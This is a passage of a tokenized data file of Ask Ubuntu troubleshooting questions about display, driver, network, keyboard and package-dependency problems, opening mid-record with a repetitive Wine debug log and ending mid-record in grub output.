inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : urlmon : uri_getpropertybstr ( 0x27a6198 ) - > ( 6 0x33e224 4 ) fixme : process : getnumahighestnodenumber ( 0x33ecc0 ) : stub fixme : thread : getthreadpreferreduilanguages 48 , 0x33e8c0 , ( nil ) 0x33e8b8 fixme : thread : getthreadpreferreduilanguages 48 , 0x33e8c0 , ( nil ) 0x33e8b8 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub **fixme : time : getcalendarinfow unimplemented caltype 1 fixme : time : getcalendarinfow unimplemented caltype 1 fixme : time : getcalendarinfow unimplemented caltype 2 fixme : time : getcalendarinfow unknown caltype 56 fixme : time : getcalendarinfow unknown caltype 55 fixme : time : getcalendarinfow unknown caltype 49 fixme : time : getcalendarinfow unknown caltype 50 fixme : time : getcalendarinfow unknown caltype 51 fixme : time : getcalendarinfow unknown caltype 52 fixme : time : getcalendarinfow unknown caltype 53 fixme : time : getcalendarinfow unknown caltype 54 fixme : time : getcalendarinfow unknown caltype 21 fixme : time : getcalendarinfow unknown caltype 22 fixme : time : getcalendarinfow unknown caltype 23 fixme : time : getcalendarinfow unknown caltype 24 fixme : time : getcalendarinfow unknown caltype 25 fixme : time : getcalendarinfow unknown caltype 26 fixme : time : getcalendarinfow unknown caltype 27 fixme : time : getcalendarinfow unknown caltype 28 fixme : time : getcalendarinfow unknown caltype 29 fixme : time : getcalendarinfow unknown caltype 30 fixme : time : getcalendarinfow unknown caltype 31 fixme : time : getcalendarinfow unknown caltype 32 fixme : time : getcalendarinfow unknown caltype 33 fixme : time : getcalendarinfow unknown caltype 34 fixme : time : getcalendarinfow unknown caltype 35 fixme : time : getcalendarinfow unknown caltype 36 fixme : time : getcalendarinfow unknown caltype 37 fixme : time : getcalendarinfow unknown caltype 38 fixme : time : getcalendarinfow unknown caltype 39 fixme : time : getcalendarinfow unknown caltype 40 fixme : time : getcalendarinfow unknown caltype 41 fixme : time : getcalendarinfow unknown caltype 42 fixme : time : getcalendarinfow unknown caltype 43 fixme : time : getcalendarinfow unknown caltype 44 fixme : time : getcalendarinfow unknown caltype 45 fixme : time : getcalendarinfow unknown caltype 46** fixme : time : getcalendarinfow unimplemented caltype 4 fixme : time : getcalendarinfow unimplemented caltype 4 fixme : time : getcalendarinfow unknown caltype 57 fixme : time : getcalendarinfow unknown caltype 57 fixme : nls : enumtimeformatsw unknown time format ( 2 ) fixme : nls : enumtimeformatsw unknown time format ( 2 )
342049	everything gone except desktop	i recently changed the default font using dconf tool . that was ok , and after trying that font , i opened dconf again and clicked `` restore default '' button . then the screen was unresponsive , i forced it to shutdown . next when i tried to login , the login screen was ok , but after logging in , nothing would show up , not even launcher , terminal , folders on desktop etc. , . only visible things are alert box to ask me to confirm shutting down when i press power button . what might be the reason for this and what are possible solutions ? i tried the solution mentioned for the original question , but i get the error gtkwarning : default font does not have a family set gtkwarning : default font does not have a positive size set is there any way to correct this without logging in as a new user ? tried solutions : unity does n't load , no launcher , no dash appears unity does n't load , no launcher , no dash appears ( for this , i get an error saying error unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported segmentation fault ( core dumped ) unity does n't load , no launcher , no dash appears unity does n't load , no launcher , no dash appears unity does n't load , no launcher , no dash appears unity does n't load , no launcher , no dash appears everything gone except desktop ( all the above links are different ) . all the above solutions did n't work and one more thing that started happening is when i do export display=:0 ccsm and enter ui by ctrl+alt+f7 , it says , compizconfig-settings-manager has stopped working unexpectedly . i tried re-installing ccsm but , it says , it is already installed and it is the newest version . os : ubuntu 12.04
342051	coolbits `` 1 '' does nothing ( gtx 560ti , 310.14 , ubuntu 12.04 )	i ca n't find a way to enable overclocking on ubuntu 12.04 . this is my xorg.conf : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` coolbits '' `` 1 '' endsection the only levels of coolbits that i have tested were 1 , 4 and 5 , only 4 worked . what else can i do to enable coolbits 1 ?
342053	anything that converts gui actions to commands to be sent to remote ubuntu via ssh ?	is there anything that would allow me to run a gui on client side of ssh ( ie on windows ) & that would convert the gui actions made to corresponding commands to be sent via ssh client ( in my case putty ) to remote ubuntu server ? also it could show me the corresponding commands that it sends via ssh . i dont have gui installed on my ubuntu server so i am looking out for any tools that may be installed on the client ( running windows 7 ) that communicates to ubuntu server via ssh . does anything like that exists ? or may be a tool that helps me doing frequent actions via putty more easily than me requiring to remember exactly how to accurately write all the ubuntu commands ?
342055	wired and wireless networks not detected in ubuntu 12.10	i have a toshiba satellite l55 laptop which has qualcomm atheros ar8161 network interface card . i took help from the following link : how do i install drivers for the atheros ar8161 ethernet controller ? but my problem is that i am unable to connect to internet either through wired or wireless connection . then how should i proceed further ? thanks in advance .
342061	power on/off usb ports	is it possible to on/off specific usb port using terminal in ubuntu ? lsusb displays the following result bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 2232:1020 bus 002 device 009 : id 0bc2 : a013 seagate rss llc bus 002 device 003 : id 0a5c:219c broadcom corp. seagate is my external hard-disk . can i power it off in terminal ? i tried http : //stackoverflow.com/questions/4702216/controlling-a-usb-power-supply-on-off-with-linux . but confused what should be replaced in place of usbx
342064	mounting external hd inside encrypted folder	i have an external hd ( usb 3.0 , 1tb ) that contains all of my music files . for the past 6 months , i 've had my linux box ( xubuntu 13.04 , kernel 3.8 ) rigged to automatically mount this drive on login to the ~/music folder . the other day , i decided to encrypt my home folder . unfortunately , the hd no longer mounts properly in the music folder . it still mounts fine if i manually mount it to /media/music or any other place outside of my home folder , but even though it claims to have mounted to ~/music , none of my files or folders show up inside the music folder . is this not doable inside an encrypted folder , even after it has been unlocked ? or are there some extra steps i am missing ? thanks ! edit : df lists the drive ( /dev/sdc2 ) as mounted to /home//music , but the folder is still empty .
342066	how to permanently configure keyboard	i use a turkish keyboard which i have converted to english ( ubuntu server 12.04 ) . my problem is that the single quote is not present on the keyboard but is instead represent by a comma in midair . to fix this i use the command sudo dpkg-reconfigure keyboard-configuration the problem is each time i shutdown , changes are reverted thus everytime i start the system , i have to type that command . i was thinking of making it a cronjob but i`m sure there can be another way to make the changes permanent .
342067	bookmarks indicator	i just realized that i would like a bookmark indicator -- not a menu , but a stretch of buttons on the indicator taskbar on the top of the ubuntu desktop that can directly be clicked to call a particular web site in the default browser . has anyone stumbled across a thing like this ? i 'm using 12.04 and 13.04 on my computers .
342068	how to compile a xul extension in ubuntu 13.04 ? ( specifically xul-ext-gnome-keyring )	i am using the gnome-keyring extension for firefox/thunderbird . there used to be a ppa for this plugin , but the maintainer gave up , as the new policy for xulrunner makes it uneasy to keep up with latest firefox version : see the rationale here . it refers specifically to this post stating xulrunner dev will be removed from ubuntu . so the extension is now available in debian , in fedora , but not in ubuntu ! currently , i just pinned firefox to the latest compatible version ( 22 ) , but i am willing to compile this extension by hand . the source code can be found on github . it depends on xulrunner sdk . so here is my questions : is there a way to get xulrunner sdk into my system and to compile this extension ? if so , is it likely to work with firefox/thunderbird as shipped by ubuntu ? is there some kind of howto / documentation on the current state of developping / maintaining / packaging extensions for firefox on ubuntu ?
342069	ubuntu software center wo n't accept ubuntu one login	i 'm in ubuntu 12.04 . i 'm already logged in to an ubuntu one account . i 'm trying to install software from the ubuntu software center . it 's asking me for my ubuntu one login , and then rejecting it . ( it does work to log me in to ubuntu one on this computer , an android phone , and a windows 7 computer . ) i 've tried resetting my password via a `` reset password '' email link : i get a message that i 'm unauthenticated . i 've tried cutting and pasting the login code sent via email : the code is not recognized . i 've tried creating a new account -- something i do n't really want to do -- it tells me an account already exists for my email address . help ?
342070	fn + f2 what does it do ?	when i prees fn+f2 my screen turn black what does it do ? i want to know what change does it make . when at window7 i press fn+f2 it will turn on wifi . after i restart nothing happen , did it will make eror ? sorry about my bad english
342076	step by step ubuntu 12.04 install of realtek rtl8188ce driver	i am completely new and have never even used terminal before , let alone try install a driver , so while iâve read countless answers in response to the above problem , i do n't even understand when i should press 'enter ' in terminal . my situation is i bought a new toshiba satellite c850- f0155 with no os . installed ubuntu 12.04 from a cd . but only way to connect to net is through ethernet cable ( i.e . no wireless option ) . the wireless card is a realtek rtl8188ce . my kernal is 3.2.0-52-generic . i downloaded rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ( 1 ) .tar.bz2 . i attempted to follow the instructions in the read me file , but i do n't for the life of me understand them , nor any others in forums i 've poured over . if there is a kind soul who could help me with step by step ( ă la idiots guide ) i would be deeply deeply greatful . p.s . i have emailed realtek with my query but was just sent the same read me file i could n't understand to begin with .
342077	vpn connection dns server order reversed	in fixing my admittedly somewhat custom setup on my ubuntu 12.04 workstation , when i connect the vpn connection , the dns server of it is added to the bottom of /etc/resolv.conf instead of the top , resulting in all dns queries intended towards the vpn destination to fail ( because the first dns server on this list responds negatively to the queries and my computer never asks the bottom dns server to provide it 's answer ) . if i edit /etc/resolv.conf by hand and simply move the nameserver record that network manager adds there to the top , it works fine . but this workaround is obviously not preferred . i should probably mention i turned off dnsmasq because with it , the vpn 's dns resolution does not work at all , despite all the files containing what they should have . what is the proper way to fix this ?
342081	how to crash bacula network backup system	how do i crash a bacula network backup system .i was given a project to build a bacula network backup system and crash it , then recover.i was able to build it but now im on crashing stage.please help
342082	error message `` error : brokencount > 0 ''	i get the red symbol with the white line through it at the top of my screen . it says error : brokencount > 0 now i go into the synaptic package manager and click on the broken dependecies and get this : linux-image-generic-pae 3.2.0.52.62 now i know the problem occured when i tried to update and did n't have enough storage space in order to do it . how do i go about fixing it and getting ubuntu healthy again ? i followed rajagenupula instructions . however , the issue still remains . does having a usb memory stick plugged in cause problems ? terminal reported back with this : skunk @ ubuntu : ~ $ sudo mv /var/lib/dpkg/status /var/lib/dpkg/status-bad [ sudo ] password for skunk : skunk @ ubuntu : ~ $ sudo mv /var/lib/dpkg/status /var/lib/dpkg/status-bad mv : can not stat `/var/lib/dpkg/status ' : no such file or directory skunk @ ubuntu : ~ $ sudo cp /var/lib/dpkg/status-old /var/lib/dpkg/status skunk @ ubuntu : ~ $ sudo mv /var/lib/dpkg/available /var/lib/dpkg/available-bad skunk @ ubuntu : ~ $ sudo cp /var/lib/dpkg/available-old /var/lib/dpkg/available skunk @ ubuntu : ~ $ sudo rm -rf /var/lib/dpkg/updates/* skunk @ ubuntu : ~ $ sudo rm -rf /var/lib/apt/lists/* skunk @ ubuntu : ~ $ sudo mkdir /var/lib/apt/lists/partial skunk @ ubuntu : ~ $ sudo rm /var/cache/apt/*.bin skunk @ ubuntu : ~ $ sudo apt-get clean skunk @ ubuntu : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-generic-pae : depends : linux-image-3.2.0-52-generic-pae but it is not installable e : unmet dependencies . try using -f. skunk @ ubuntu : ~ $ sudo apt-get update get:1 http : //us.archive.ubuntu.com precise release.gpg [ 198 b ] get:2 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:3 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:4 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:5 http : //us.archive.ubuntu.com precise release [ 49.6 kb ] get:6 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] get:7 http : //security.ubuntu.com precise-security/main sources [ 84.9 kb ] get:8 http : //us.archive.ubuntu.com precise/main sources [ 934 kb ] get:9 http : //security.ubuntu.com precise-security/restricted sources [ 2,494 b ] get:10 http : //security.ubuntu.com precise-security/universe sources [ 28.0 kb ] get:11 http : //security.ubuntu.com precise-security/multiverse sources [ 1,803 b ] get:12 http : //security.ubuntu.com precise-security/main i386 packages [ 331 kb ] get:13 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:14 http : //security.ubuntu.com precise-security/universe i386 packages [ 84.5 kb ] get:15 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,633 b ] get:16 http : //security.ubuntu.com precise-security/main translationindex [ 74 b ] get:17 http : //security.ubuntu.com precise-security/multiverse translationindex [ 72 b ] get:18 http : //security.ubuntu.com precise-security/restricted translationindex [ 72 b ] get:19 http : //us.archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:20 http : //security.ubuntu.com precise-security/universe translationindex [ 73 b ] get:21 http : //security.ubuntu.com precise-security/main translation-en [ 150 kb ] get:22 http : //us.archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:23 http : //security.ubuntu.com precise-security/multiverse translation-en [ 1,299 b ] get:24 http : //security.ubuntu.com precise-security/restricted translation-en [ 1,253 b ] get:25 http : //security.ubuntu.com precise-security/universe translation-en [ 51.9 kb ] get:26 http : //us.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:27 http : //us.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:28 http : //us.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:29 http : //us.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:30 http : //us.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:31 http : //us.archive.ubuntu.com precise/main translationindex [ 3,706 b ] get:32 http : //us.archive.ubuntu.com precise/multiverse translationindex [ 2,676 b ] get:33 http : //us.archive.ubuntu.com precise/restricted translationindex [ 2,596 b ] get:34 http : //us.archive.ubuntu.com precise/universe translationindex [ 2,922 b ] get:35 http : //us.archive.ubuntu.com precise-updates/main sources [ 416 kb ] get:36 http : //us.archive.ubuntu.com precise-updates/restricted sources [ 7,031 b ] get:37 http : //us.archive.ubuntu.com precise-updates/universe sources [ 95.3 kb ] get:38 http : //us.archive.ubuntu.com precise-updates/multiverse sources [ 8,358 b ] get:39 http : //us.archive.ubuntu.com precise-updates/main i386 packages [ 707 kb ] get:40 http : //us.archive.ubuntu.com precise-updates/restricted i386 packages [ 11.4 kb ] get:41 http : //us.archive.ubuntu.com precise-updates/universe i386 packages [ 219 kb ] get:42 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 14.0 kb ] get:43 http : //us.archive.ubuntu.com precise-updates/main translationindex [ 3,564 b ] get:44 http : //us.archive.ubuntu.com precise-updates/multiverse translationindex [ 2,605 b ] get:45 http : //us.archive.ubuntu.com precise-updates/restricted translationindex [ 2,461 b ] get:46 http : //us.archive.ubuntu.com precise-updates/universe translationindex [ 2,850 b ] get:47 http : //us.archive.ubuntu.com precise/main translation-en [ 726 kb ] get:48 http : //us.archive.ubuntu.com precise/multiverse translation-en [ 93.4 kb ] get:49 http : //us.archive.ubuntu.com precise/restricted translation-en [ 2,395 b ] get:50 http : //us.archive.ubuntu.com precise/universe translation-en [ 3,341 kb ] get:51 http : //us.archive.ubuntu.com precise-updates/main translation-en [ 310 kb ] get:52 http : //us.archive.ubuntu.com precise-updates/multiverse translation-en [ 8,064 b ] get:53 http : //us.archive.ubuntu.com precise-updates/restricted translation-en [ 2,637 b ] get:54 http : //us.archive.ubuntu.com precise-updates/universe translation-en [ 126 kb ] fetched 19.3 mb in 2min 4s ( 155 kb/s ) reading package lists ... done skunk @ ubuntu : ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-52-generic-pae ; however : package linux-image-3.2.0-52-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-3.2.0-52-generic ( 3.2.0-52.78 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic update-initramfs : generating /boot/initrd.img-3.2.0-52-generic cryptsetup : warning : failed to detect canonical device of /host/ubuntu/disks/root.disk cryptsetup : warning : could not determine root device from /etc/fstab warning : no support for locale : en_us.utf8 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-52-generic /boot/vmlinuz-3.2.0-52-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-52-generic found initrd image : /boot/initrd.img-3.2.0-52-generic found linux image : /boot/vmlinuz-3.2.0-51-generic-pae found initrd image : /boot/initrd.img-3.2.0-51-generic-pae found linux image : /boot/vmlinuz-3.2.0-51-generic found initrd image : /boot/initrd.img-3.2.0-51-generic found linux image : /boot/vmlinuz-3.2.0-49-generic-pae found initrd image : /boot/initrd.img-3.2.0-49-generic-pae found linux image : /boot/vmlinuz-3.2.0-49-generic found initrd image : /boot/initrd.img-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-48-generic-pae found initrd image : /boot/initrd.img-3.2.0-48-generic-pae found linux image : /boot/vmlinuz-3.2.0-48-generic found initrd image : /boot/initrd.img-3.2.0-48-generic found linux image : /boot/vmlinuz-3.2.0-44-generic-pae found initrd image : /boot/initrd.img-3.2.0-44-generic-pae found linux image : /boot/vmlinuz-3.2.0-44-generic found initrd image : /boot/initrd.img-3.2.0-44-generic found linux image : /boot/vmlinuz-3.2.0-43-generic-pae found initrd image : /boot/initrd.img-3.2.0-43-generic-pae found linux image : /boot/vmlinuz-3.2.0-43-generic found initrd image : /boot/initrd.img-3.2.0-43-generic found linux image : /boot/vmlinuz-3.2.0-41-generic-pae found initrd image : /boot/initrd.img-3.2.0-41-generic-pae found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic-pae found initrd image : /boot/initrd.img-3.2.0-40-generic-pae found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic-pae found initrd image : /boot/initrd.img-3.2.0-39-generic-pae found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic-pae found initrd image : /boot/initrd.img-3.2.0-38-generic-pae found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic-pae found initrd image : /boot/initrd.img-3.2.0-37-generic-pae found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-36-generic-pae found initrd image : /boot/initrd.img-3.2.0-36-generic-pae found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-35-generic-pae found initrd image : /boot/initrd.img-3.2.0-35-generic-pae found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic-pae found initrd image : /boot/initrd.img-3.2.0-34-generic-pae found linux image : /boot/vmlinuz-3.2.0-34-generic found initrd image : /boot/initrd.img-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-33-generic-pae found initrd image : /boot/initrd.img-3.2.0-33-generic-pae found linux image : /boot/vmlinuz-3.2.0-33-generic found initrd image : /boot/initrd.img-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic-pae found initrd image : /boot/initrd.img-3.2.0-32-generic-pae found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic-pae found initrd image : /boot/initrd.img-3.2.0-31-generic-pae found linux image : /boot/vmlinuz-3.2.0-31-generic found initrd image : /boot/initrd.img-3.2.0-31-generic found linux image : /boot/vmlinuz-3.2.0-30-generic-pae found initrd image : /boot/initrd.img-3.2.0-30-generic-pae found linux image : /boot/vmlinuz-3.2.0-30-generic found initrd image : /boot/initrd.img-3.2.0-30-generic found linux image : /boot/vmlinuz-3.2.0-29-generic-pae found initrd image : /boot/initrd.img-3.2.0-29-generic-pae found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found linux image : /boot/vmlinuz-3.2.0-27-generic-pae found initrd image : /boot/initrd.img-3.2.0-27-generic-pae found linux image : /boot/vmlinuz-3.2.0-27-generic found initrd image : /boot/initrd.img-3.2.0-27-generic found linux image : /boot/vmlinuz-3.2.0-26-generic-pae found initrd image : /boot/initrd.img-3.2.0-26-generic-pae found linux image : /boot/vmlinuz-3.2.0-26-generic found initrd image : /boot/initrd.img-3.2.0-26-generic found linux image : /boot/vmlinuz-3.2.0-25-generic-pae found initrd image : /boot/initrd.img-3.2.0-25-generic-pae found linux image : /boot/vmlinuz-3.2.0-25-generic found initrd image : 